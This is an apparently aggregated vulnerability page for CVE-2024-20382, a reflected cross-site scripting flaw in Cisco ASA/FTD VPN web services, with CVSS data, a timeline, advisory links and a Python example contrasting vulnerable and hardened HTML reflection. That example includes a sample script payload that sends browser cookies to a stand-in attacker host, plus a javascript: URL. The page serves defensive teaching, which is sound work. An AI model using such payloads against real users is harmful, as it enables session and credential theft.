CVE-2024-20382

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) (CWE-80)

Published: Oct 23, 2024 / Updated: 27d ago

CVSS 6.1 (Medium) / EPSS 0.04%

A vulnerability in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device. This vulnerability is due to improper validation of user-supplied input to application endpoints. An attacker could exploit this vulnerability by persuading a user to follow a link designed to submit malicious input to the affected application. A successful exploit could allow the attacker to execute arbitrary HTML or script code in the browser in the context of the web services page.
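The weakness class here (CWE-80, reflected XSS through a crafted link) comes down to a server reflecting a request parameter into HTML without escaping it for the context it lands in. The following is an added, illustrative Python example of that pattern and its fix; it is not Cisco ASA/FTD code, and the page layout, parameter names (`user`, `next`) and crafted inputs are assumptions, since the advisory does not disclose the affected endpoints or parameters.

```python
# Added example: the CWE-80 reflection pattern beside a hardened version.
# Illustrative code only; the template, parameter names and payloads are assumed.
import html
from urllib.parse import urlparse

# Assumed page: one parameter lands in an HTML text node, one in an href attribute.
PAGE_TEMPLATE = (
    '<html><body><p>Login failed for {user}.</p>'
    '<a href="{next}">Retry</a></body></html>'
)


def render_vulnerable(user: str, next_url: str) -> str:
    """Reflects both request parameters straight into the page (the CWE-80 pattern)."""
    return PAGE_TEMPLATE.format(user=user, next=next_url)


def safe_redirect_target(next_url: str) -> str:
    """Attribute context: allow only same-site relative paths.

    Rejects absolute URLs (any scheme, including javascript:), protocol-relative
    '//host' forms and the '/\\host' variant browsers normalise to '//host'.
    """
    parsed = urlparse(next_url)
    if (
        parsed.scheme
        or parsed.netloc
        or not next_url.startswith("/")
        or next_url[1:2] in ("/", "\\")
    ):
        return "/"
    return next_url


def render_hardened(user: str, next_url: str) -> str:
    """Escape for the HTML text context and validate the value for the URL context."""
    return PAGE_TEMPLATE.format(
        user=html.escape(user, quote=True),
        next=html.escape(safe_redirect_target(next_url), quote=True),
    )


# Constructed inputs of the kind a malicious link would carry (assumed, not from the advisory).
CRAFTED_USER = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
CRAFTED_NEXT = "javascript:alert(document.domain)"


def reflects_unsafely(page: str) -> bool:
    """Crude check used below: does the rendered page still carry an executable context?"""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    print("vulnerable:", reflects_unsafely(render_vulnerable(CRAFTED_USER, CRAFTED_NEXT)))
    print("hardened:  ", reflects_unsafely(render_hardened(CRAFTED_USER, CRAFTED_NEXT)))
```

The point of keeping two separate fixes is that escaping alone does not protect the `href` attribute: `html.escape("javascript:alert(1)")` is unchanged and still executes when clicked, so the URL context needs validation of the value, not just encoding of its characters.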

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Oct 23, 2024 at 6:05 PM (CVE - NEW | THREATINT): First article mentioning CVE-2024-20382 found by Feedly.
Oct 23, 2024 at 6:06 PM: Feedly estimated the CVSS score as MEDIUM.
Oct 23, 2024 at 6:15 PM: NVD published the first details for CVE-2024-20382.
Oct 23, 2024 at 6:20 PM (nvd): A CVSS base score of 6.1 has been assigned.
Oct 24, 2024 at 7:53 AM: Detection for the vulnerability has been added to Qualys (317547).
Oct 24, 2024 at 9:50 AM: EPSS score was set to 0.04% (Percentile: 9.8%).
Oct 28, 2024 at 7:53 AM: Detection for the vulnerability has been added to Qualys (317561).

Affected Systems

Cisco/adaptive_security_appliance_software

Attack Patterns

CAPEC-18: XSS Targeting Non-Script Elements

News

Cisco Products Multiple Vulnerabilities

Multiple vulnerabilities were identified in Cisco products. A remote attacker could exploit some of these vulnerabilities to trigger a denial of service condition, elevation of privilege, remote code execution, sensitive information disclosure, cross-site scripting and security restriction bypass on the targeted system.

Note: CVE-2024-20481 is being exploited in the wild. The Cisco Product Security Incident Response Team (PSIRT) is aware of malicious use of this vulnerability. Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain a missing release of resource after effective lifetime vulnerability that could allow an unauthenticated, remote attacker to cause a denial-of-service (DoS) of the RAVPN service.

RISK: Extremely High Risk
TYPE: Security software and application – Security Software & Appliance
Impact: Denial of Service, Remote Code Execution, Elevation of Privilege, Information Disclosure, Cross-Site Scripting, Security Restriction Bypass
System / Technologies affected: Cisco Adaptive Security Appliance (ASA) Software; Cisco Adaptive Security Virtual Appliance (ASAv); Cisco Secure Firewall Threat Defense Virtual (FTDv); Cisco FirePOWER Services; Cisco Firepower Threat Defense (FTD) Software; Cisco Secure Firewall Management Center (FMC) Software

Please refer to the links below for detail:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-vdb-snort-djj4cnbR
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-dos-eEDWu5RM
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-4gYEWMKg
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-infodisc-RL4mJFer
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-html-inj-nfJeYHxz
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-rf-bypass-OY8f3pnM
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-bypass-PTry37fX
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-geoip-bypass-MB4zRDu
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-bf-dos-vDZhLqrW
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-nsgacl-bypass-77XnEAsL
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-acl-bypass-VvnLNKqf
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-priv-esc-hBS9gnwq
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-dhJxQYZs
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-yjj7ZjVq
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-sql-inject-2EnmTC8v
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-sql-inj-LOYAFcfq
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-2HBkA97G
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-file-read-5q4mQRn
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-priv-esc-CMQ4S6m7
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-g8AOKnDP
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-nyH3fhp
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-lce-vU3ekMJ3
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-snmp-dos-7TcnzxTU
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-dap-dos-bhEkP7n
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-tls-dos-QXYE5Ufy
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd2100-snort-dos-M9HuMt75
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sa-ftd-snort-fw-BCJTZPMu
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftdvirtual-dos-MuenGnYR
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-tls-CWY6zXB
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-dos-hOnB9pH4
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-cZf8gT
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ikev2-dos-9FgEyHsF
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF

Solutions: Before installation of the software, please visit the vendor web-site for more details.
cisco cisco-sa-snort-rf-bypass-OY8f3pnM: Multiple Cisco Products Snort Rate Filter Bypass Vulnerability
Development Last Updated: 10/24/2024 CVEs: CVE-2024-20274 , CVE-2024-20387 , CVE-2024-20426 , CVE-2024-20331 , CVE-2024-20264 , CVE-2024-20485 , CVE-2024-20273 , CVE-2024-20474 , CVE-2024-20471 , CVE-2024-20377 , CVE-2024-20495 , CVE-2024-20407 , CVE-2024-20341 , CVE-2024-20473 , CVE-2024-20364 , CVE-2024-20402 , CVE-2024-20493 , CVE-2024-20300 , CVE-2024-20339 , CVE-2024-20269 , CVE-2024-20340 , CVE-2024-20370 , CVE-2024-20382 , CVE-2024-20342 , CVE-2024-20412 , CVE-2024-20329 , CVE-2024-20372 , CVE-2024-20403 , CVE-2024-20431 , CVE-2024-20494 , CVE-2024-20410 , CVE-2024-20472 , CVE-2024-20260 , CVE-2024-20330 , CVE-2024-20388 , CVE-2024-20409 , CVE-2024-20526 , CVE-2024-20268 , CVE-2024-20298 , CVE-2024-20351 , CVE-2024-20386 , CVE-2024-20415 , CVE-2024-20424 , CVE-2024-20408 , CVE-2024-20481
CVE Alert: CVE-2024-20382 - https://www.redpacketsecurity.com/cve_alert_cve-2024-20382/ #OSINT #ThreatIntel #CyberSecurity #cve_2024_20382
CVE Alert: CVE-2024-20382
An attacker could exploit this vulnerability by persuading a user to follow a link designed to submit malicious input to the affected application. A vulnerability in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device.

CVSS V3.1

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
